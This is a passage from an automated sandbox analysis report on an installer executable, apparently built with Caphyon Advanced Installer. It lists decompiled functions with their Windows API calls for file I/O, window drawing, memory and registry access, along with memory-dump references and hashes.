                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,0214169B), ref: 00BBE2C3
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BBE320
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00BBE387
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00D7CF5B), ref: 00BBE3AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                                                                              • String ID: aix$html
                                                                                                                                                                              • API String ID: 2030708724-2369804267
                                                                                                                                                                              • Opcode ID: 445d89464d1dd2dc030ac855238df7dfc2597648fe7e1eff85c4a0141e9e5962
                                                                                                                                                                              • Instruction ID: 6e73356f5937b870a465dfb3714ad38fac921c0c17de11a5499d7dbcb755e74e
                                                                                                                                                                              • Opcode Fuzzy Hash: 445d89464d1dd2dc030ac855238df7dfc2597648fe7e1eff85c4a0141e9e5962
                                                                                                                                                                              • Instruction Fuzzy Hash: 20619A70901248DFDB10CFA4D949BEEBBF4FB8A708F244159E011BB2D1D7B56948CBA1
                                                                                                                                                                              Function 00BA2830 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00EA1668,00000000,02141699,00000000,00DE7E63,000000FF,?,02141699), ref: 00BA29A3
                                                                                                                                                                              • GetLastError.KERNEL32(?,02141699), ref: 00BA29AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                              • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                                                                              • API String ID: 439134102-34576578
                                                                                                                                                                              • Opcode ID: d934e9c181871b2a384a1942533105c79a1339d690d3ae29f96d3ee8cb2c45be
                                                                                                                                                                              • Instruction ID: 6eab475e4491b0fa11df670ca1eaa7ae4b6f610ad8dbe3c83c15b8d203c2d534
                                                                                                                                                                              • Opcode Fuzzy Hash: d934e9c181871b2a384a1942533105c79a1339d690d3ae29f96d3ee8cb2c45be
                                                                                                                                                                              • Instruction Fuzzy Hash: 0A51F3B1904259DFCB10DF99DD0679E7BF4EB4A720F1842A9E814F7380E774A908CB61
                                                                                                                                                                              Function 00D14240 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00EA16AC), ref: 00D14250
                                                                                                                                                                              • LoadLibraryW.KERNEL32(Shell32.dll,?,?,00EA16AC), ref: 00D14263
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00D14273
                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00D142FC
                                                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00D1433E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                                                                                                                                                              • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                                                                                                                                                              • API String ID: 2352187698-2988203397
                                                                                                                                                                              • Opcode ID: 4c3694cca11538643a960c7405bd2006d5e979853294b40cc0ea4a78a6541ece
                                                                                                                                                                              • Instruction ID: bc7d03114583099f47f5131b04545baf1502e879668160879df19a3a70a68122
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c3694cca11538643a960c7405bd2006d5e979853294b40cc0ea4a78a6541ece
                                                                                                                                                                              • Instruction Fuzzy Hash: 19310271640701AFDB209F29EC05BAB77F5EF94711F58842CF889971A0EF7198CA87A1
                                                                                                                                                                              Function 00CAA450 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA4E0
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CAA51D
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA534
                                                                                                                                                                              • SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 00CAA55F
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00C889F0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                                                                                                                              • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                                                                              • API String ID: 3410024541-3123591815
                                                                                                                                                                              • Opcode ID: 47d04753460f11c2d36c2d7adaf5691da90a4b310a7e97d88fe254e8be934690
                                                                                                                                                                              • Instruction ID: 862a1961dee5bccd45f906ecf0298b351845c1b325880f2fa72a04d255f31977
                                                                                                                                                                              • Opcode Fuzzy Hash: 47d04753460f11c2d36c2d7adaf5691da90a4b310a7e97d88fe254e8be934690
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21C172A41705EFCB20DF19ED06B59B760EB1BB30F144215E460B72D0DBB0BA08CB66
                                                                                                                                                                              Function 00BC1130 Relevance: 12.1, APIs: 8, Instructions: 138COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC115A
                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00BC1167
                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00BC12A2
                                                                                                                                                                                • Part of subcall function 00BC0FB0: GetWindowRect.USER32(?,?), ref: 00BC0FDC
                                                                                                                                                                                • Part of subcall function 00BC0FB0: GetWindowRect.USER32(?,?), ref: 00BC0FEC
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC11FB
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BC120B
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BC1225
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3200805268-0
                                                                                                                                                                              • Opcode ID: aa79ab7d602628adb6b961cdf03611c1f56acafc492b706b741d48665e36026f
                                                                                                                                                                              • Instruction ID: ed585eda78f17da923c91d914f81e4e35340c132cec3cb2112f872beffd4ceec
                                                                                                                                                                              • Opcode Fuzzy Hash: aa79ab7d602628adb6b961cdf03611c1f56acafc492b706b741d48665e36026f
                                                                                                                                                                              • Instruction Fuzzy Hash: 56418B305087019FC321DF29C980E6BF7EAFFA6704F544A5DF095A6562EB30E9888B52
                                                                                                                                                                              Function 00BC92C0 Relevance: 12.1, APIs: 8, Instructions: 125COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowDC.USER32(?,02141699,?,00000000,?,?,?,?,?,00000000,00DAE6A5,000000FF,?,00BC9082,?,?), ref: 00BC9302
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC9321
                                                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00BC9330
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00BC938E
                                                                                                                                                                              • ExcludeClipRect.GDI32(?,?,?,?,00000000), ref: 00BC93B8
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00BC93D2
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BC93E1
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00BC9404
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectWindow$DeleteRectSelect$ClipEnabledExclude
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3871716574-0
                                                                                                                                                                              • Opcode ID: 79f981c74a7cf92ae28741a2b2816dade2d7ab2f8d260fdf0f437fd3a8ba8fbe
                                                                                                                                                                              • Instruction ID: e82a3351f2ddd279d9595a98d572ac10e7f73974d9bac6a183cff2fc5fbe5051
                                                                                                                                                                              • Opcode Fuzzy Hash: 79f981c74a7cf92ae28741a2b2816dade2d7ab2f8d260fdf0f437fd3a8ba8fbe
                                                                                                                                                                              • Instruction Fuzzy Hash: E6415171A00215AFEB14DFA5DD48BAEBBF9FB88710F10426AE915F3250DB745D05CB60
                                                                                                                                                                              Function 00D7F7A0 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                                • Part of subcall function 00D7F896: IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7DB
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00BB8164,?), ref: 00D7F802
                                                                                                                                                                              • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,00BB8164,?), ref: 00D7F816
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F829
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00BB8164,?), ref: 00D7F83C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2460949444-0
                                                                                                                                                                              • Opcode ID: eed45bd37e021879e12d93f965e75723763be056be5e48f805d8945b13333367
                                                                                                                                                                              • Instruction ID: 30662b472efdefff37084521541b44ee2faeecd06c91f08c20c3b63995a23234
                                                                                                                                                                              • Opcode Fuzzy Hash: eed45bd37e021879e12d93f965e75723763be056be5e48f805d8945b13333367
                                                                                                                                                                              • Instruction Fuzzy Hash: C111EBB1700611EFE73117AAAC48F27765DFB49785F254131F909F6250EA21CC4887B2
                                                                                                                                                                              Function 00CCF520 Relevance: 10.8, APIs: 7, Instructions: 346fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,02141699), ref: 00CCF5A9
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00CCF61B
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00CCF8BC
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00CCF91A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Read$CloseCreateHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1724936099-0
                                                                                                                                                                              • Opcode ID: d0a2f3e11bd6153d0c4d5e840b5f729c6b147caeaa3e78c83de78532a2a52048
                                                                                                                                                                              • Instruction ID: 9db21b93fb8422ae33b952370465a9d6d0973440f355fed07bf7628922c2c21a
                                                                                                                                                                              • Opcode Fuzzy Hash: d0a2f3e11bd6153d0c4d5e840b5f729c6b147caeaa3e78c83de78532a2a52048
                                                                                                                                                                              • Instruction Fuzzy Hash: 04D17F71D00308DBDF24CFA4C849BAEBBB6BF49304F20426DE415BB291D774AA46CB91
                                                                                                                                                                              Function 00C7B930 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 342COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BBD5
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,00EA6B7C,00000000), ref: 00C7BC0C
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BCA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$InfoParametersSystem
                                                                                                                                                                              • String ID: AI_FRAME_NO_CAPTION_$Dialog$`Dialog` = '
                                                                                                                                                                              • API String ID: 3910108132-2270296660
                                                                                                                                                                              • Opcode ID: 939ba4575a8f9364e83cd77e98f8a9d47dc09e11115a6acc3ceceaefc0536ec8
                                                                                                                                                                              • Instruction ID: 206d3e957ae518ca5ff48ca689818f2de0b180a704d3c3b96841a3d746cf515e
                                                                                                                                                                              • Opcode Fuzzy Hash: 939ba4575a8f9364e83cd77e98f8a9d47dc09e11115a6acc3ceceaefc0536ec8
                                                                                                                                                                              • Instruction Fuzzy Hash: 71D1B271900208DFCB14DFB9DD85B9EB7B1EF5A310F148269E919BB291D770B948CBA0
                                                                                                                                                                              Function 00BBE3F0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 285registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,02141699), ref: 00BBE491
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BBE4BA
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00BBE72E
                                                                                                                                                                              • CloseHandle.KERNEL32(?,02141699,?,?,00000000,00DAC9ED,000000FF,?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000), ref: 00BBE7BE
                                                                                                                                                                              Strings
                                                                                                                                                                              • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00BBE486
                                                                                                                                                                              • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00BBE4F2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$CreateErrorEventHandleLast
                                                                                                                                                                              • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                              • API String ID: 1253123496-2079760225
                                                                                                                                                                              • Opcode ID: 7be8ae3461459dc6b1efe369d98fe8dab460d44f85574a31e07b162127b7e9bb
                                                                                                                                                                              • Instruction ID: ae389da7ce0ae965eb21134eb8e832c6f07c847e627f6aef5e9ae4dfc800a0af
                                                                                                                                                                              • Opcode Fuzzy Hash: 7be8ae3461459dc6b1efe369d98fe8dab460d44f85574a31e07b162127b7e9bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 37C1CF70D00248DFDB24CF68C885BEEBBF4EF54704F10829DE459A7291DBB4AA88CB51
                                                                                                                                                                              Function 00BBC570 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1648,02141699,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC5DA
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC65A
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC813
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC834
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
